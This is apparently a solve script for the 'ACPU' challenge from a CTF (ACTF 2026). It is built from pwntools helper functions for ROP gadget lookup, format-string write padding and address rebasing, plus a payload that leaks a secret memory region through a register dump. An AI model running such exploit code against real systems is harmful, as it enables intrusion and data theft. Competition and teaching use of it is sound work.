def sla(delim, data): return p.sendlineafter(delim, data)
# Receive helpers: up to `numb` bytes, until a delimiter, one line, everything, exactly `numb` bytes.
def r(numb=4096): return p.recv(numb)
def ru(delim, drop=True):return p.recvuntil(delim, drop)
def rl(bool): return p.recvline(keepends=bool)
def ra(t=None): return p.recvall(timeout=t)
def rn(numb): return p.recvn(numb)
# Close the tube / hand control to the user.
def cl(): return p.close()
def it(): return p.interactive()
# Unpack up to 8 bytes as u64: uc64 pads with zero bytes on the left, uu64 on the right.
def uc64(data): return u64(data.rjust(8, b'\x00'))
def uu64(data): return u64(data.ljust(8, b'\x00'))
# Log and return elf.address + off (the `or ret` relies on lg() returning a falsy value).
def addr(off): return lg(hex(off), (ret := elf.address + off)) or ret
# Coerce a value to bytes: bytes pass through, anything else is str()-encoded.
def cb(data): return data if isinstance(data, bytes) else str(data).encode()
# Log "name: value" via log.success; ints are shown in hex, bytes are decoded leniently.
def lg(name, data): return log.success(name + ': ' + (hex(data) if isinstance(data, int) else data.decode(errors='ignore') if isinstance(data, bytes) else str(data)))
# Answer a menu prompt with the decimal index.
def menu(idx, pmt=b'>'): return sla(pmt, str(idx).encode())
# Encode an integer as 3 big-endian bytes.
def bl(address): return (address).to_bytes(3, 'big')
# Build a bytes object from the low 8 bits of each argument.
def bt(*values): return bytes([v & 0xff for v in values])
# Rebase `elf` from a leaked address; `offset` is a symbol name or a numeric offset.
def ntpie(leak, offset, name='PIE'): return setattr(elf, 'address', leak - (elf.sym[offset] if isinstance(offset, str) else offset)) or lg(name, elf.address)
# Absolute address of `val` relative to the given binary's base.
def base(val, binary=elf): return binary.address + val
# Repeat `content` (str or bytes) `num` times as bytes.
def fill(num, content=b'A'): return (content.encode() if isinstance(content, str) else content) * num
# Find the first occurrence of `s` in the ELF, log it and return its address.
def se(s): return lg(s if isinstance(s, str) else f"bytes: {s.hex()}", (addr := next(elf.search(s if isinstance(s, bytes) else s.encode())))) or addr
# Format-string helpers: [padding needed, new printed count] so that the running
# count matches the low 16 bits (shn) or low 8 bits (shhn) of `target`.
def shn(target, current_printed): return [((target & 0xffff) - current_printed) % 0x10000, current_printed + (((target & 0xffff) - current_printed) % 0x10000)]
def shhn(target, current_printed): return [((target & 0xff) - current_printed) % 0x100, current_printed + (((target & 0xff) - current_printed) % 0x100)]
# ROP objects are cached per binary so each one is built only once.
_rop_cache = {}


def gg(s):
    """Return the address of a ROP gadget in `elf`.

    `s` is a ';'-separated instruction sequence, e.g. "pop rdi; ret".
    The address is logged on success.

    Raises:
        ValueError: if no matching gadget is found.
    """
    target = elf
    if target not in _rop_cache:
        _rop_cache[target] = ROP(target)
    rop = _rop_cache[target]
    instrs = [x.strip() for x in s.split(';')]
    if (gadget := rop.find_gadget(instrs)):
        lg(s, gadget.address)
        return gadget.address
    else:
        raise ValueError(f"[-] Critical: Gadget not found: {s}")
def ga(delim=b'|', name='Leak', data=None):
    """Collect every 0x-prefixed hex number from some data, log and return them.

    Where the data comes from depends on `data`:
      - int: receive that many bytes from the tube;
      - other truthy value: use it directly (str is encoded to bytes);
      - otherwise: receive from the tube until `delim`.

    Returns:
        list[int]: the parsed values, in order of appearance.
    """
    target_data = p.recv(data) if isinstance(data, int) else (data if data else ru(delim))
    if isinstance(target_data, str):
        target_data = target_data.encode()
    hex_list = re.findall(b'0x[0-9a-fA-F]+', target_data)
    return [lg(f'{name}[{i}]', x) or x for i, x in enumerate([int(a, 16)for a in hex_list])]
#################################################################################
# Build the program. li32/lw/sw/jalr/pack_words are not defined in this file —
# presumably instruction encoders provided by zenpwnpy.
words = []
# x5 = 0x80000000, the secret-region address used in the write-up.
words += li32(5, 0x80000000)
for i in range(16):
    # Load secret word i into x7, immediately store x7 to public address 0,
    # then load it back from there into x(10 + i).
    words.append(lw(7, i * 4, 5))
    words.append(sw(7, 0, 0))
    words.append(lw(10 + i, 0, 0))
# Jump to 0x2000, which the write-up found ends the run and dumps registers.
words += li32(6, 0x2000)
words.append(jalr(0, 0, 6))
payload = pack_words(words)
sla(b"give me your code:\n", base64.b64encode(payload))
out = ru(b"give me your code:\n").decode(errors="ignore")
# Parse lines of the form "xN = 0xXXXXXXXX" from the register dump.
regs = {}
for m in re.finditer(r"x(\d+)\s*=\s*0x([0-9a-fA-F]{8})", out):
    regs[int(m.group(1))] = int(m.group(2), 16)
# x10..x25 hold the 16 leaked words; reassemble them as little-endian bytes.
leak = b""
for reg in range(10, 26):
    leak += regs[reg].to_bytes(4, "little")
print(leak)
it()
题目链接:CTF-Writeups/ACTF 2026/ACPU at main · Zenquiem/CTF-Writeups